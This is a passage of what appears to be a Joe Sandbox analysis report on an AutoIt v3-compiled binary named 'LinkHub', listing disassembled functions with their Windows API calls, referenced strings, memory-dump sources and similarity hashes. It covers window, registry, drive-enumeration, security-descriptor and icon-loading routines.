SendMessageW.USER32(00000404,00000001,00000000), ref: 00E5349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00E534D4
GetStockObject.GDI32(00000011), ref: 00E534DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E534EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00E534F4

Strings

AutoIt v3, xrefs: 00E53355
static, xrefs: 00E533AC, 00E534CE
DISPLAY, xrefs: 00E533B7
msctls_progress32, xrefs: 00E53470

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 5e1952737b1b6b4a3204d92ab8df00607c85e64525bf5c9beec3fabbbcc07cf5
Instruction ID: 22580c0a2dcd65f3b556d3b19b014b9e209bbdb2e941de14e40410300c11559b
Opcode Fuzzy Hash: 5e1952737b1b6b4a3204d92ab8df00607c85e64525bf5c9beec3fabbbcc07cf5
Instruction Fuzzy Hash: 32B14C71A00205AFDB14DFA9DC49FAEBBA9EB09751F004519FA15F72A0C7B4AD44CBA0

Function 00E45524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00E45532
GetDriveTypeW.KERNEL32(?,00E6DC30,?,\\.\,00E6DCD0), ref: 00E4560F
SetErrorMode.KERNEL32(00000000,00E6DC30,?,\\.\,00E6DCD0), ref: 00E4577B

Strings

SCSI, xrefs: 00E456CF
Unknown, xrefs: 00E45632, 00E456C8
\\.\, xrefs: 00E45584
Fixed, xrefs: 00E4564E
CDROM, xrefs: 00E45640
iSCSI, xrefs: 00E45707
SAS, xrefs: 00E4570E
RAID, xrefs: 00E45700
SSD, xrefs: 00E4568F
PhysicalDrive, xrefs: 00E455BB
SSA, xrefs: 00E456EB
RAMDisk, xrefs: 00E45639
MMC, xrefs: 00E45723
Virtual, xrefs: 00E4572A
SATA, xrefs: 00E45715
USB, xrefs: 00E456F9
Network, xrefs: 00E45647
Fibre, xrefs: 00E456F2
ATAPI, xrefs: 00E456D6
Removable, xrefs: 00E45655, 00E4565A
1394, xrefs: 00E456E4
FileBackedVirtual, xrefs: 00E45731
ATA, xrefs: 00E456DD

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 2aa1bd4c7dde960ae4e74f34997476c04fbeffa4d8dbe453430dd7b28d8ca622
Instruction ID: 5f0e404f1bd0d2e09c24bdb341ace4b72eac2a8b93750b35f23f13ca869c4f7c
Opcode Fuzzy Hash: 2aa1bd4c7dde960ae4e74f34997476c04fbeffa4d8dbe453430dd7b28d8ca622
Instruction Fuzzy Hash: 5C612332A08A09DFCB24DF24E9969BCB7B1EF45354B246067E406BB293C731DD05CB61

Function 00DD2521 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DD25F8
GetSystemMetrics.USER32(00000007), ref: 00DD2600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DD262B
GetSystemMetrics.USER32(00000008), ref: 00DD2633
GetSystemMetrics.USER32(00000004), ref: 00DD2658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00DD2675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00DD2685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00DD26B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00DD26CC
GetClientRect.USER32(00000000,000000FF), ref: 00DD26EA
GetStockObject.GDI32(00000011), ref: 00DD2706
SendMessageW.USER32(00000000,00000030,00000000), ref: 00DD2711

Part of subcall function 00DD19CD: GetCursorPos.USER32(?), ref: 00DD19E1
Part of subcall function 00DD19CD: ScreenToClient.USER32(00000000,?), ref: 00DD19FE
Part of subcall function 00DD19CD: GetAsyncKeyState.USER32(00000001), ref: 00DD1A23
Part of subcall function 00DD19CD: GetAsyncKeyState.USER32(00000002), ref: 00DD1A3D

SetTimer.USER32(00000000,00000000,00000028,00DD199C), ref: 00DD2738

Strings

AutoIt v3 GUI, xrefs: 00DD26B0
(, xrefs: 00DD271A
<), xrefs: 00DD255C
(, xrefs: 00DD2749
<), xrefs: 00E139A6
(, xrefs: 00E13909

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: <)$<)$AutoIt v3 GUI$($($(
API String ID: 1458621304-3080182634
Opcode ID: 955c4e5c37b9bd009f24ffa1ab0fca3556d258e7e8f6f4dbd131a50a3b729633
Instruction ID: c4c6de9ddfd53d85530853af3bc9793c4f05ed775369069d38a720bd97675005
Opcode Fuzzy Hash: 955c4e5c37b9bd009f24ffa1ab0fca3556d258e7e8f6f4dbd131a50a3b729633
Instruction Fuzzy Hash: 70B18D31A002099FDB14DFA9DC45BEE7BB4FB88714F10421AFA16BB294C7B0E944CB61

Function 00E61A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00E61BC4
GetDesktopWindow.USER32 ref: 00E61BD9
GetWindowRect.USER32(00000000), ref: 00E61BE0
GetWindowLongW.USER32(?,000000F0), ref: 00E61C35
DestroyWindow.USER32(?), ref: 00E61C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E61C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E61CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E61CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 00E61CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00E61CE1
IsWindowVisible.USER32(00000000), ref: 00E61D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00E61D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00E61D6C
GetWindowRect.USER32(00000000,?), ref: 00E61D84
MonitorFromPoint.USER32(?,?,00000002), ref: 00E61DAA
GetMonitorInfoW.USER32(00000000,?), ref: 00E61DC4
CopyRect.USER32(?,?), ref: 00E61DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 00E61E46

Strings

0, xrefs: 00E61B6F
(, xrefs: 00E61DB7
tooltips_class32, xrefs: 00E61C82

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: e8cd862b94c62a467661088d788dafc8874080807d2a088b8311d6c3431126ed
Instruction ID: 153a588149f1ff9de10ee10c485051b3a3f20b17a36e5a19bacbb8e0c73b54ef
Opcode Fuzzy Hash: e8cd862b94c62a467661088d788dafc8874080807d2a088b8311d6c3431126ed
Instruction Fuzzy Hash: 72B1A971608301AFD715DF65D884B6FBBE4EF84394F04895DF899AB2A1C771E804CBA2

Function 00E60CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00E60D81
_wcslen.LIBCMT ref: 00E60DBB
_wcslen.LIBCMT ref: 00E60E25
_wcslen.LIBCMT ref: 00E60E8D
_wcslen.LIBCMT ref: 00E60F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E60F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E60FA0

Part of subcall function 00DEFD52: _wcslen.LIBCMT ref: 00DEFD5D

Part of subcall function 00E32B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E32BA5
Part of subcall function 00E32B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E32BD7

Strings

ISSELECTED, xrefs: 00E60F79
FINDITEM, xrefs: 00E610C3
GETSUBITEMCOUNT, xrefs: 00E60E20, 00E60E3B
SELECTINVERT, xrefs: 00E6101A
VIEWCHANGE, xrefs: 00E61111
GETSELECTED, xrefs: 00E6107D
SELECTALL, xrefs: 00E60FB1
GETSELECTEDCOUNT, xrefs: 00E60F0C, 00E60F27
DESELECT, xrefs: 00E61038
SELECTCLEAR, xrefs: 00E60FC9
GETTEXT, xrefs: 00E60E88, 00E60EA3
SELECT, xrefs: 00E60FE4
GETITEMCOUNT, xrefs: 00E60DB2, 00E60DD3

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 4b9554d0e016d27c0d49384bc82a8f43f2af4c683dd1db8b452a80ad7f1e7ea3
Instruction ID: 2755efd74b270b32842b9755b24c1d66a6a7f0469476d2c19a491164586e776f
Opcode Fuzzy Hash: 4b9554d0e016d27c0d49384bc82a8f43f2af4c683dd1db8b452a80ad7f1e7ea3
Instruction Fuzzy Hash: 27E10D312483518FCB14DF24D95186BB7E2FF89398B14596DF896AB3A1CB31ED01CBA1

Function 00E316D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E31A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E31A60
Part of subcall function 00E31A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E314E7,?,?,?), ref: 00E31A6C
Part of subcall function 00E31A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E314E7,?,?,?), ref: 00E31A7B
Part of subcall function 00E31A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E314E7,?,?,?), ref: 00E31A82
Part of subcall function 00E31A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E31A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E31741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E31775
GetLengthSid.ADVAPI32(?), ref: 00E3178C
GetAce.ADVAPI32(?,00000000,?), ref: 00E317C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E317E2
GetLengthSid.ADVAPI32(?), ref: 00E317F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E31801
HeapAlloc.KERNEL32(00000000), ref: 00E31808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E31829
CopySid.ADVAPI32(00000000), ref: 00E31830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E3185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E31881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E31893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E318BA
HeapFree.KERNEL32(00000000), ref: 00E318C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E318CA
HeapFree.KERNEL32(00000000), ref: 00E318D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E318DA
HeapFree.KERNEL32(00000000), ref: 00E318E1
GetProcessHeap.KERNEL32(00000000,?), ref: 00E318ED
HeapFree.KERNEL32(00000000), ref: 00E318F4

Part of subcall function 00E31ADF: GetProcessHeap.KERNEL32(00000008,00E314FD,?,00000000,?,00E314FD,?), ref: 00E31AED
Part of subcall function 00E31ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E314FD,?), ref: 00E31AF4
Part of subcall function 00E31ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E314FD,?), ref: 00E31B03

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 301b1cb6f68ccaa20aa5b153cb49ba164629cf3d625edbe190cb783399421ce8
Instruction ID: ce59ea0e54d545d68fc1d42e7044ab56ab5bdf73c58de85816db370196913828
Opcode Fuzzy Hash: 301b1cb6f68ccaa20aa5b153cb49ba164629cf3d625edbe190cb783399421ce8
Instruction Fuzzy Hash: FD7159B2E0420AAFDF10DFA5EC48FAFBFB9AF04354F144169E915B6190D7719A09CB60

Function 00E5CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E5CF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,00E6DCD0,00000000,?,00000000,?,?), ref: 00E5CFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00E5D004
_wcslen.LIBCMT ref: 00E5D054
_wcslen.LIBCMT ref: 00E5D0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00E5D112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00E5D221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00E5D2AD
RegCloseKey.ADVAPI32(?), ref: 00E5D2E1
RegCloseKey.ADVAPI32(00000000), ref: 00E5D2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00E5D3C0

Strings

REG_EXPAND_SZ, xrefs: 00E5D02D
REG_QWORD, xrefs: 00E5D323
REG_MULTI_SZ, xrefs: 00E5D155
REG_SZ, xrefs: 00E5D0A4
REG_DWORD, xrefs: 00E5D264
REG_BINARY, xrefs: 00E5D373

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 1070eef619ad8a29439626e9b76f8f77775250bca7c87d52fe7be686bdfb398d
Instruction ID: 1a7c409c80d4f31da8f578bed95e377acb1bfd81d9d2902ff1a3479fc548e93b
Opcode Fuzzy Hash: 1070eef619ad8a29439626e9b76f8f77775250bca7c87d52fe7be686bdfb398d
Instruction Fuzzy Hash: B11259356042019FDB24DF14C891B2AB7E5EF88714F15889DF94AAB3A2CB31ED45CBA1

Function 00E613BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00E61462
_wcslen.LIBCMT ref: 00E6149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E614F0
_wcslen.LIBCMT ref: 00E61526
_wcslen.LIBCMT ref: 00E615A2
_wcslen.LIBCMT ref: 00E6161D

Part of subcall function 00DEFD52: _wcslen.LIBCMT ref: 00DEFD5D

Part of subcall function 00E33535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E33547

Strings

EXPAND, xrefs: 00E61694
GETTOTALCOUNT, xrefs: 00E6148E, 00E614B3
EXISTS, xrefs: 00E61618, 00E61633
GETTEXT, xrefs: 00E61733
ISCHECKED, xrefs: 00E6177D
COLLAPSE, xrefs: 00E6159D, 00E615B8
SELECT, xrefs: 00E617AD
GETSELECTED, xrefs: 00E616EA
UNCHECK, xrefs: 00E617DA
CHECK, xrefs: 00E61521, 00E6153C
GETITEMCOUNT, xrefs: 00E616BA

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 64ce8c5c377f70b7642d3b35c8520c0b646226681a61792538d88a48a8525663
Instruction ID: eb65b9bde783c06d79c9333e5ed5cedc030e8462ccbc1517edbe5d8485c8889b
Opcode Fuzzy Hash: 64ce8c5c377f70b7642d3b35c8520c0b646226681a61792538d88a48a8525663
Instruction Fuzzy Hash: 4BE1EF356083418FCB05EF25C45186AB7E2FF94394F18989DF896AB362DB31ED05CBA1

Function 00E5D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E5C10E,?,?), ref: 00E5D415
_wcslen.LIBCMT ref: 00E5D451
_wcslen.LIBCMT ref: 00E5D4C8
_wcslen.LIBCMT ref: 00E5D4FE
_wcslen.LIBCMT ref: 00E5D559
_wcslen.LIBCMT ref: 00E5D58F
_wcslen.LIBCMT ref: 00E5D5DF

Strings

HKEY_LOCAL_MACHINE, xrefs: 00E5D4C2, 00E5D4C7
HKU, xrefs: 00E5D650
HKCC, xrefs: 00E5D60C
HKCR, xrefs: 00E5D589, 00E5D58E
HKLM, xrefs: 00E5D4F8, 00E5D4FD
HKCU, xrefs: 00E5D62E
HKEY_CURRENT_CONFIG, xrefs: 00E5D5D9, 00E5D5DE
HKEY_CURRENT_USER, xrefs: 00E5D61D
HKEY_USERS, xrefs: 00E5D63F
HKEY_CLASSES_ROOT, xrefs: 00E5D553, 00E5D558

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: e47f0135c3510a507bc5699510aac4a18ee10fc34f748256a0bcb8940d41c1b2
Instruction ID: 13aaaeb46cd2bb7ef9ce64b8a2aebb0c6a0b656b50e4572ff57dae5ee3cc60e4
Opcode Fuzzy Hash: e47f0135c3510a507bc5699510aac4a18ee10fc34f748256a0bcb8940d41c1b2
Instruction Fuzzy Hash: 3471E53260811ACBCF309E68CD515BB33A1AB6136EB212925EC66F7294FA71DD4DC360

Function 00E68D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E68DB5
_wcslen.LIBCMT ref: 00E68DC9
_wcslen.LIBCMT ref: 00E68DEC
_wcslen.LIBCMT ref: 00E68E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E68E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E66691), ref: 00E68EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E68EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E68F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E68F5C
FreeLibrary.KERNEL32(?), ref: 00E68F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E68F78
DestroyIcon.USER32(?,?,?,?,?,00E66691), ref: 00E68F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E68FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E68FB0

Strings

.dll, xrefs: 00E68E06
.icl, xrefs: 00E68DC3
.exe, xrefs: 00E68DE3

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 5cf10ed2cb4eba122055fe6a590161a9ab5951b4ecb2d3c381c09fb7396e5461
Instruction ID: ccae1366f975669c7414df1b7c4f7b14e7a6d1170fb7a2c9ec36543965cd4b9b
Opcode Fuzzy Hash: 5cf10ed2cb4eba122055fe6a590161a9ab5951b4ecb2d3c381c09fb7396e5461
Instruction Fuzzy Hash: 3A61F171A40218BEEB14DF64ED41BBF77A8FF08B54F108206F915E61D1DBB1A940CBA0

Function 00E448BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00E4493D
_wcslen.LIBCMT ref: 00E44948
_wcslen.LIBCMT ref: 00E4499F
_wcslen.LIBCMT ref: 00E449DD
GetDriveTypeW.KERNEL32(?), ref: 00E44A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E44A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E44A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E44ACC

Strings

wait, xrefs: 00E44A89
type cdaudio alias cd wait, xrefs: 00E44A46
open , xrefs: 00E44A2A
set cd door , xrefs: 00E44A6D
close, xrefs: 00E44943, 00E4495D
closed, xrefs: 00E4494D, 00E44972, 00E4498B, 00E449C3, 00E449DC
close cd wait, xrefs: 00E44AB7
open, xrefs: 00E44999, 00E4499E

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 7c4f3c1ee7ed72d952a5d77c621a337cfb9566ea78d36242dc32185c5cfb0484
